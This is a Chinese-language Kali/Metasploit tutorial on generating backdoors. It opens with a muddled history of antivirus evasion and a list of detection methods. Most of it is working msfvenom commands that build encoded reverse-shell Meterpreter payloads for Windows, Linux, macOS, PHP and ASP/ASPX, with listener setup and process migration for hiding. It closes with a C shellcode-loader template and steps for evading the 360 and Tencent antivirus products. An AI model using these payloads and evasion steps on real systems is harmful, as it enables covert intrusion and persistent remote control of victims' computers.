渗透利器-kali工具 (第五章-6) Metasploit后门生成模块

本文内容：

• 免杀技术发展史
• 杀软原理简介
• 后门生成常用命令
• 常见生成后门模式

---

从后门生成模块到权限维持：

　　免杀技术发展史：

　　　　理论上讲，免杀一定是出现在杀毒软件之后的。

　　　　通过杀毒软件的发展史不难使用，第一款杀毒软件kill 1.0 是Winsh公司1987年推出的。

　　　　也就是说免杀技术至少在1989年以后才发展起来。[国外无从拷问，国内非常晚]

　　　　1989年：第一款杀毒软件Mcafee诞生，标志着反病毒反差杀时代的到来

　　　　1997年：国内出现了第一个可以自动变异的千面人病毒，自动变异就是病毒针对杀毒软件的免杀方法之一，但是与免杀手法的定义有出入。

　　　　2002.7.31：国内第一个真正意义上的变种病毒"中国黑客II"出现，它处理具有新的特征之外，还实现了"中国黑客"第一代所谓实现的功能，可见这个变种也是病毒编写者自己制造的。

　　　　2005.09：免杀技术开始真正的火起来。

　　　　由上面的信息可见，国内在1997年出现了第一个可以自动变异的千面人病毒，虽然自动变异也可以看为是针对杀毒软件的一种免杀方法，但是由于与免杀手法的定义有出入，所以如果将国内免杀技术起源定位1997年会显得比较牵强。

　　　　2002.7.31：国内第一个真正意义上的变种病毒"中国黑客II"才迟迟出现，因此我们暂且可以将国内免杀技术的起源定位在2002年7月。

　　杀软原理简介：

　　　　免杀感念：免除被杀：

　　　　杀毒软件检测方式：　　

　　　　　　1.扫描压缩包技术：即是对压缩包和封装文件作为分析检查的技术。

　　　　　　2.程序窜改防护：即是避免恶意程序借由删除杀毒侦测程序而大肆破坏电脑。

　　　　　　3.修复技术：即是对 恶意程序所损坏的文件进行还原。

　　　　　　4.急救盘杀毒：扫描最常用的磁盘，系统关键位置，耗时较短。

　　　　　　5.智能扫描：扫描最常用的磁盘，系统关键位置，耗时较短。

　　　　　　6.全盘扫描：扫描电脑全部磁盘，耗时较长。

　　　　　　7.勒索软件防护：保护电脑中的文件不被黑盒恶意加密。

　　　　　　8.开机扫描：当电脑开机时自动进行扫描，可以扫描压缩文档和可能不需要的程序。

　　　　监控技术：　

　　　　　　1.内存监控：当发现内存中存在病毒的时候，就主动报警；监控所有进程；监控读取到内存中的文件；监控读取到内存的网络数据。

　　　　　　2.文件监控：当发现写到磁盘上的文件中存在病毒，或者是被病毒感染，就会主动报警。

　　　　　　3.邮件监控：当发现电子邮件的附件存在病毒时进行拦截。

　　　　　　4.网页防护：组织网络攻击和提醒用户可疑的应用程序行为。

　　　　　　5.行为防护：

　　　　扫描引擎：

　　　　　　1.特征码扫描

　　　　　　2.文件校验和法

　　　　　　3.进程行为检测法[沙盒模式]

　　　　　　4.主动防御技术

　　　　　　5.机器学习识别技术

　　　　免杀技术介绍：

　　　　　　1.修改特征码

　　　　　　2.花指令免杀

　　　　　　3.加壳免杀

　　　　　　4.内存免杀

　　　　　　5.二次编译

　　　　　　6.分离免杀

　　　　　　7.资源修改

1，后门生成常用命令：　　

　　从后门生成模块到权限维持：

　　　　-p 指定payload模块

　　　　-l 列出可用项

　　　　-f 指定文件类型

　　　　-e 加载编码器

　　　　-b 删除无效字符

　　　　-i 指定编码次数

　　　　-x 捆绑文件

　　　　-o 导出文件

　　　　-v 指定变量名

　　使用MSFvenom快速生成木马并且进行连接：

　　　　生成一个常见木马文件：

　　　　　　msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.221.143 lport=1250 -f exe > shell.exe

　　　　连接木马文件：

　　　　　　1.监听模块：　use exploit/multi/handler

　　　　　　2.设置payload：set payload windows/meterpreter/reverse_tcp

　　　　　　3.查看设置选项：options需要设置选项：[lhost、lport]

　　　　　　4.设置本机地址：set lhost 127.0.0.1

　　　　　　5.设置端口：set lport 1433

　　　　　　6.开始连接：run

　　　　　　7.查看用户权限：getuid

　　　　迁移进程：

　　　　　　迁移进程命令：migrate

　　　　　　ps：查看所有进程

　　　　　　使用迁移进程命令：migrate 1433[进程PID]：将我们的进程迁移到我们想要迁移的进程里了，就发现不了我们的进程了。

　　　　杀死进程：

　　　　　　杀死进程命令：kill：杀死命令

　　　　　　kali 5744[进程PID]

　　　　补充：查看进程命令：?

2，常见的生成后门模式：

　　1.Windows：

　　　　msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:ack.exe 

　　　　msfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:ack.exe

　　2.Linux：

　　　　msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

　　3.MAC：

　　　　msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

　　4.PHP：
　　　　msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.153.138 LPORT=1520 -f raw > shell.php

　　5.ASP：

　　　　msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

　　6.ASPX：

　　　　msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx　　　

3，绕过360生成测试：

　　1.安装编译软件VC++6.0

　　2.生成木马后门：

　　　　msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘x00’ lhost=192.168.177.128 lport=1250 -f c

　　3.编译C语言为exe文件：

　　　　#include "stdafx.h"
　　　　#include <stdio.h>
　　　　#pragma comment( linker, "/subsystem:"windows" /entry:"mainCRTStartup"")
　　　　unsigned char buf[] =
　　　　（这里放生成好的数组）
　　　　main()
　　　　{
　　　　((void(*)(void))&buf)();
　　　　}

　　4.测试是否成功：

　　5.VC++6.0使用教程：

　　　　1.新建Win32 Console Application工程：

　　　　　　打开VC6.0，在菜单栏中选择“文件 -> 新建”，或者 Ctrl+N。

　　　　　　切换到“工程”选项卡，选择“Win32 Console Application”，填写工程名称和路径，点击“确定”

　　　　2.会弹出一个对话框询问类型，这里选择“一个简单的程序”

　　　　3.点击树状列表-下方FiveView视图，选择-Source Files--xxx.cpp--打开

　　　　4.将编译c语言为exe文件代码复制替换进去。

　　　　5.将MSF生成的后门数组，放进去代码提示的地方。

　　　　6.编译之后，组建即可。

　　　　在线查杀：http://www.virscan.org　　

　　　　推荐一篇文章：http://c.biancheng.net/view/464.html

4，绕过腾讯管家生成测试：

　　与360生成测试部分一致，差异在于：

　　　　需要添加图标进行绕过测试，将特征码改变

　　　　在VC++6.0新建文件，编译，组建，改变.exe文件的内存大小，即成功，改变特征码。

　　　　可以实现腾讯管家的绕过。